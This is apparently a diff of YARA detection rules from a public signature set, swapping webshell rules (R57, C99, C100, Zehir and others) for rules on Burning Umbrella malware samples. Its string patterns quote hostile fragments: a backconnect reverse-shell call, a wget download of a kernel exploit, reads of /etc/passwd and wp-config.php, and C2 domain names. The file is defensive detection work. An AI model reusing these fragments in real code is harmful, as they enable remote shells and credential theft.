-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
-		hash3 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
-		hash4 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"
-		hash5 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
-		hash6 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash7 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
-		hash8 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"
-		hash9 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash10 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"
-		hash11 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash12 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash13 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"
-		hash14 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
-
-	strings:
-		$s1 = "displaysecinfo(\"List of Attributes\",myshellexec(\"lsattr -a\"));" fullword ascii
-		$s2 = "displaysecinfo(\"RAM\",myshellexec(\"free -m\"));" fullword ascii
-		$s3 = "displaysecinfo(\"Where is perl?\",myshellexec(\"whereis perl\"));" fullword ascii
-		$s4 = "$ret = myshellexec($handler);" fullword ascii
-		$s5 = "if (posix_kill($pid,$sig)) {echo \"OK.\";}" fullword ascii
+		hash1 = "a4ce3a356d61fbbb067e1430b8ceedbe8965e0cfedd8fb43f1f719e2925b094a"
+		hash2 = "a8bfc1e013f15bc395aa5c047f22ff2344c343c22d420804b6d2f0a67eb6db64"
+		hash3 = "959612f2a9a8ce454c144d6aef10dd326b201336a85e69a604e6b3892892d7ed"
 
 	condition:
-		filesize < 900KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and pe.imphash ( ) == "f5b113d6708a3927b5cc48f2215fcaff"
 }
-rule SIGNATURE_BASE_Webshell_R57Shell_2 : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_8 : FILE
 {
 	meta:
-		description = "Detects Webshell R57"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f2298430-1eff-5ed2-abee-3b26b36d16b7"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9321-L9348"
+		id = "1b89d5a1-1425-5cb7-b429-563769bc0943"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L132-L145"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2af51c3d181801b14d5dbb3107cd78cf7ab4a590b7967f231ec707b7ee03fa26"
-		score = 70
+		logic_hash = "1a42667463ff006b155c93b8986ab75441ba00d0c3c146c2d4c6929250627d8d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
-		hash2 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
-		hash3 = "aa957ca4154b7816093d667873cf6bdaded03f820e84d8f1cd5ad75296dd5d4d"
-		hash4 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
-		hash5 = "756b788401aad4bfd4dbafd15c382d98e3ba079390addb5b0cea7ff7f985f881"
-		hash6 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
-		hash7 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
-		hash8 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
-		hash9 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
-		hash10 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
-		hash11 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
-		hash12 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
-		hash13 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+		hash1 = "73270fe9bca94fead1b5b38ddf69fae6a42e574e3150d3e3ab369f5d37d93d88"
 
 	strings:
-		$s1 = "$connection = @ftp_connect($ftp_server,$ftp_port,10);" fullword ascii
-		$s2 = "echo $lang[$language.'_text98'].$suc.\"\\r\\n\";" fullword ascii
+		$s1 = "cmd /c open %s" fullword ascii
 
 	condition:
-		filesize < 900KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_27_9_Acid_C99_Locus7S : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_10 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f5f33b64-b815-5e32-8d2e-5e455651ec5d"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9350-L9372"
+		id = "e4cb2211-efbe-55f9-99e3-c01601904509"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L147-L163"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3005c09dfcb1f2e33a09ed73e28ef889c74e1f5daf619dd272e0b9b30cdb0f94"
-		score = 70
+		logic_hash = "14d0ab1114c168d7222a49e68ba12718b6285969e667b95be665d59b1fc98358"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"
-		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash3 = "960feb502f913adff6b322bc9815543e5888bbf9058ba0eb46ceb1773ea67668"
-		hash4 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"
-		hash5 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash6 = "5ae121f868555fba112ca2b1a9729d4414e795c39d14af9e599ce1f0e4e445d3"
-		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
-		hash8 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
+		hash1 = "70992a72412c5d62d003a29c3967fcb0687189d3290ebbc8671fa630829f6694"
+		hash2 = "48f0bbc3b679aac6b1a71c06f19bb182123e74df8bb0b6b04ebe99100c57a41e"
+		hash3 = "5475ae24c4eeadcbd49fcd891ce64d0fe5d9738f1c10ba2ac7e6235da97d3926"
 
 	strings:
-		$s0 = "$blah = ex($p2.\" /tmp/back \".$_POST['backconnectip'].\" \".$_POST['backconnectport'].\" &\");" fullword ascii
-		$s1 = "$_POST['backcconnmsge']=\"</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>\";" fullword ascii
+		$s1 = "revjj.syshell.org" fullword ascii
 
 	condition:
-		filesize < 1711KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Backdoor_PHP_Agent_R57_Mod_Bizzz_Shell_R57 : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_11 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files Backdoor.PHP.Agent.php, r57.mod-bizzz.shell.txt ..."
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "00d3159c-f5d2-5b49-9499-3bb938776858"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9374-L9399"
+		id = "9762c68c-4d69-5d38-aaf4-0048e7404147"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L165-L178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "51660ea25d1b2290c0ca30377dbf378cac8d7b7650603f1dbe5b7914c530d5cf"
-		score = 70
+		logic_hash = "847681b3e9d4fc38c483663f5a7e16e7f8f95cfa77728d7316edbe6fbf5fe2c1"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6"
-		hash2 = "f51a5c5775d9cca0b137ddb28ff3831f4f394b7af6f6a868797b0df3dcdb01ba"
-		hash3 = "16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2"
-		hash4 = "59105e4623433d5bf93b9e17d72a43a40a4d8ac99e4a703f1d8851ad1276cd88"
-		hash5 = "6dc417db9e07420a618d44217932ca8baf3541c08d5e68281e1be10af4280e4a"
-		hash6 = "5d07fdfee2dc6d81da26f05028f79badd10dec066909932129d398627b2f4e94"
-		hash7 = "1db0549066f294f814ec14ba4e9f63d88c4460d68477e5895236173df437d2b8"
-		hash8 = "c6a5148c81411ec9200810619fa5eec6616800a4d76c988431c272bc8679254f"
-		hash9 = "59ea6cf16ea06ff47cf0e6a398df2eaec4d329707b8c3201fc63cbf0b7c85519"
-		hash10 = "0e0227a0001b38fb59fc07749e80c9d298ff0e6aca126ea8f4ea68ebc9a3661f"
-		hash11 = "ef74644065925aa8d64913f5f124fe73d8d289d5f019a104bf5f56689f49ba92"
+		hash1 = "278e9d130678615d0fee4d7dd432f0dda6d52b0719649ee58cbdca097e997c3f"
 
 	strings:
-		$s1 = "$_POST['cmd'] = which('" ascii
-		$s2 = "$blah = ex(" ascii
+		$s1 = "Resume.app/Contents/Java/Resume.jarPK" fullword ascii
 
 	condition:
-		filesize < 600KB and all of them
+		uint16( 0 ) == 0x4b50 and filesize < 700KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_C100 : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_12 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files c100 v. 777shell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa8317ff-680d-5b60-b8a9-a77ea58f0ed0"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9401-L9425"
+		id = "805a00e7-2959-53d8-b769-0f8e54e1bbd5"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L180-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cc8c59f70f5ec6c89812b1597e9b864e358593ea5782e359cd483dee1a84b28b"
-		score = 70
+		logic_hash = "31798a39d10bfa4520d91e1f555302e9ac4e38d90f8bc27376a5e7e1ccfcc5e1"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"
-		hash2 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"
-		hash3 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"
-		hash4 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"
-		hash5 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"
-		hash6 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"
-		hash7 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"
+		hash1 = "b9aba520eeaf6511877c1eec5f7d71e0eea017312a104f30d3b8f17c89db47e8"
 
 	strings:
-		$s0 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">Kernel attack (Krad.c) PT1 (If wget installed)" fullword ascii
-		$s1 = "<center>Kernel Info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">" fullword ascii
-		$s3 = "cut -d: -f1,2,3 /etc/passwd | grep ::" ascii
-		$s4 = "which wget curl w3m lynx" ascii
-		$s6 = "netstat -atup | grep IST" ascii
+		$s1 = "%SystemRoot%\\System32\\qmgr.dll" fullword ascii
+		$s2 = "rundll32.exe %s,Startup" fullword ascii
+		$s3 = "nvsvcs.dll" fullword wide
+		$s4 = "SYSTEM\\CurrentControlSet\\services\\BITS\\Parameters" fullword ascii
+		$s5 = "http://www.sginternet.net 0" fullword ascii
+		$s6 = "Microsoft Corporation. All rights reserved." fullword wide
 
 	condition:
-		filesize < 685KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 80KB and ( pe.exports ( "SvcServiceMain" ) and 5 of them )
 }
-rule SIGNATURE_BASE_Webshell_Acidpoison : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_13 : FILE
 {
 	meta:
-		description = "Detects Poison Sh3ll - Webshell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6c201221-ca67-57fb-9bc7-fab4fc1da982"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9427-L9450"
+		id = "38c73425-bbdd-5b74-8ad4-5e0052039dd8"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L203-L215"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "31add38bcdc33d5e4b825bfa18ff1a47d5aa5aaeebd8e3adac533c471aa30629"
-		score = 70
+		logic_hash = "8cc611685a822e0484146a08f4ebc2fa8dd260dc8627929333060696d8dc35ce"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash3 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash4 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash5 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash6 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash7 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
-		hash8 = "be541cf880a8e389a0767b85f1686443f35b508d1975ee25e1ce3f08fa32cfb5"
-		hash9 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-		hash10 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-
-	strings:
-		$s1 = "elseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }" fullword ascii
+		hash1 = "d31374adc0b96a8a8b56438bbbc313061fd305ecee32a12738dd965910c8890f"
+		hash2 = "c74a8e6c88f8501fb066ae07753efe8d267afb006f555811083c51c7f546cb67"
 
 	condition:
-		filesize < 550KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and pe.imphash ( ) == "75f201aa8b18e1c4f826b2fe0963b84f"
 }
-rule SIGNATURE_BASE_Webshell_Acid_Fatalisticz_Fx_Fx_P0Ison_Sh3Ll_X0Rg_Byp4Ss_256 : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_14 : FILE
 {
 	meta:
-		description = "Detects Webshell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "80f7d202-adb8-5d9c-b176-576e3b9553c1"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9452-L9471"
+		id = "a2b3a4bb-ca60-5dc2-8124-17e654e326b8"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L217-L231"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "07cd255247c9a77b1c9b6049a2b96632252ea9572880b10991c6797c14a05d48"
-		score = 70
+		logic_hash = "37515683804e9aa076a588048713b420501b2aaf6b8617501ef550484abd1c03"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"
-		hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"
-		hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"
-		hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"
-		hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"
+		hash1 = "388ef4b4e12a04eab451bd6393860b8d12948f2bce12e5c9022996a9167f4972"
 
 	strings:
-		$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii
-		$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii
+		$s1 = "C:\\tmp\\Google_updata.exe" fullword ascii
 
 	condition:
-		filesize < 882KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
 }
-rule SIGNATURE_BASE_Webshell_Ayyildiz : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_15 : FILE
 {
 	meta:
-		description = "Detects Webshell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cc752958-eb6c-5185-b94c-5fcec833924d"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9473-L9492"
+		id = "4dc840c1-e6fa-5b21-bfcd-ef07cd85272a"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L233-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8441b7d730e337e002eeb7ae8f489e405409ddbe62f45bbc9a74c935d1d9fe66"
-		score = 70
+		logic_hash = "8541231fe1e48d7130aed64eee964f8eda6792b5dd3e708b98e9cc6f1f620cd0"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0e25aec0a9131e8c7bd7d5004c5c5ffad0e3297f386675bccc07f6ea527dded5"
-		hash2 = "9c43aada0d5429f8c47595f79a7cdd5d4eb2ba5c559fb5da5a518a6c8c7c330a"
-		hash3 = "2ebf3e5f5dde4a27bbd60e15c464e08245a35d15cc370b4be6b011aa7a46eaca"
-		hash4 = "77a63b26f52ba341dd2f5e8bbf5daf05ebbdef6b3f7e81cec44ce97680e820f9"
-		hash5 = "61c4fcb6e788c0dffcf0b672ae42b1676f8a9beaa6ec7453fc59ad821a4a8127"
-
-	strings:
-		$s0 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">Parent Directory</option>\\n\";" fullword ascii
-		$s1 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>\\n\";" fullword ascii
+		hash1 = "be6bea22e909bd772d21647ffee6d15e208e386e8c3c95fd22816c6b94196ae8"
+		hash2 = "72a8fa454f428587d210cba0e74735381cd0332f3bdcbb45eecb7e271e138501"
+		hash3 = "9cc38ea106efd5c8e98c2e8faf97c818171c52fa3afa0c4c8f376430fa556066"
+		hash4 = "1a4a64f01b101c16e8b5928b52231211e744e695f125e056ef7a9412da04bb91"
+		hash5 = "3cd42e665e21ed4815af6f983452cbe7a4f2ac99f9ea71af4480a9ebff5aa048"
 
 	condition:
-		filesize < 112KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "cc33b1500354cf785409a3b428f7cd2a"
 }
-rule SIGNATURE_BASE_Webshell_Zehir : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_16 : FILE
 {
 	meta:
-		description = "Detects Webshell - rule generated from from files elmaliseker.asp, zehir.asp, zehir.txt, zehir4.asp, zehir4.txt"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7f8f15a6-1c5b-5c75-b61a-df7b18699f5a"
-		date = "2016-01-11"
-		modified = "2025-03-29"
-		reference = "https://github.com/nikicat/web-malware-collection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9494-L9513"
+		id = "8b1970bd-571e-5c53-9170-1605c69d9d6d"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L250-L263"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c8fda66ada3581d2471b322ae65032b68c69b882c29f7469dd2ed78800c9c5f7"
-		score = 70
+		logic_hash = "2d0ee163e7f6f04bfe6941575d0916e18ce2e5c2426e0af326c9567560df3122"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218"
-		hash2 = "0c5f8a2ed62d10986a2dd39f52886c0900a18c03d6d279207b8de8e2ed14adf6"
-		hash3 = "cb9d5427a83a0fc887e49f07f20849985bd2c3850f272ae1e059a08ac411ff66"
-		hash4 = "b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d"
-		hash5 = "febf37a9e8ba8ece863f506ae32ad398115106cc849a9954cbc0277474cdba5c"
+		hash1 = "58bb3859e02b8483e9f84cc56fbd964486e056ef28e94dd0027d361383cc4f4a"
 
 	strings:
-		$s1 = "for (i=1; i<=frmUpload.max.value; i++) str+='File '+i+': <input type=file name=file'+i+'><br>';" fullword ascii
-		$s2 = "if (frmUpload.max.value<=0) frmUpload.max.value=1;" fullword ascii
+		$s1 = "http://netimo.net 0" fullword ascii
 
 	condition:
-		filesize < 200KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
 }
-rule SIGNATURE_BASE_Uploadshell_98038F1Efa4203432349Badabad76D44337319A6 : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_17 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f385b091-ce0d-5d5b-8eeb-57e00c8d0210"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9524-L9539"
+		id = "d79d3f65-f27c-582b-9258-7c84dc7682a6"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L265-L284"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "68f0de84a387a9af1a32dd8d38c66b002e16e1c954a51e6bc307580180faedbf"
+		logic_hash = "ca1dc3a03926af15527d2cb95c87457c285891d42a0aa642f49414153bcfc39e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "506a6ab6c49e904b4adc1f969c91e4f1a7dde164be549c6440e766de36c93215"
+		hash1 = "fa380dac35e16da01242e456f760a0e75c2ce9b68ff18cfc7cfdd16b2f4dec56"
+		hash2 = "854b64155f9ceac806b49f3e352949cc292e5bc33f110d965cf81a93f78d2f07"
+		hash3 = "1e462d8968e8b6e8784d7ecd1d60249b41cf600975d2a894f15433a7fdf07a0f"
+		hash4 = "3cdc149e387ec4a64cce1191fc30b8588df4a2947d54127eae43955ce3d08a01"
+		hash5 = "a026b11e15d4a81a449d20baf7cbd7b8602adc2644aa4bea1e55ff1f422c60e3"
 
 	strings:
-		$s2 = "$lol = file_get_contents(\"../../../../../wp-config.php\");" fullword ascii
-		$s6 = "@unlink(\"./export-check-settings.php\");" fullword ascii
-		$s7 = "$xos = \"Safe-mode:[Safe-mode:\".$hsafemode.\"] " fullword ascii
+		$s1 = "syshell" fullword wide
+		$s2 = "Normal.dotm" fullword ascii
+		$s3 = "Microsoft Office Word" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x3f3c and filesize < 6KB and ( all of ( $s* ) ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
 }
-rule SIGNATURE_BASE_Dkshell_F0772Be3C95802A2D1E7A4A3F5A45Dcdef6997F3 : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_18 : FILE
 {
 	meta:
-		description = "Detects a web shell"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "161ceca6-f5e8-5bcf-bc31-2a2169b1a1c7"
-		date = "2016-09-10"
-		modified = "2025-03-29"
-		reference = "https://github.com/bartblaze/PHP-backdoors"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L9541-L9555"
+		id = "d08f4676-ff28-59be-9fd4-b5a824e577d9"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti_burning_umbrella.yar#L286-L313"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "81b0a08d1b9d3640e656a5cd08b79c0a2f940a2db5c2d939d19509f993514e86"
+		logic_hash = "8ec1a1262874f636906186b569d231d6e3dd97ed6ef5cbddcbaf9f80cee301a0"
 		score = 75
 		quality = 85
 		tags = "FILE"
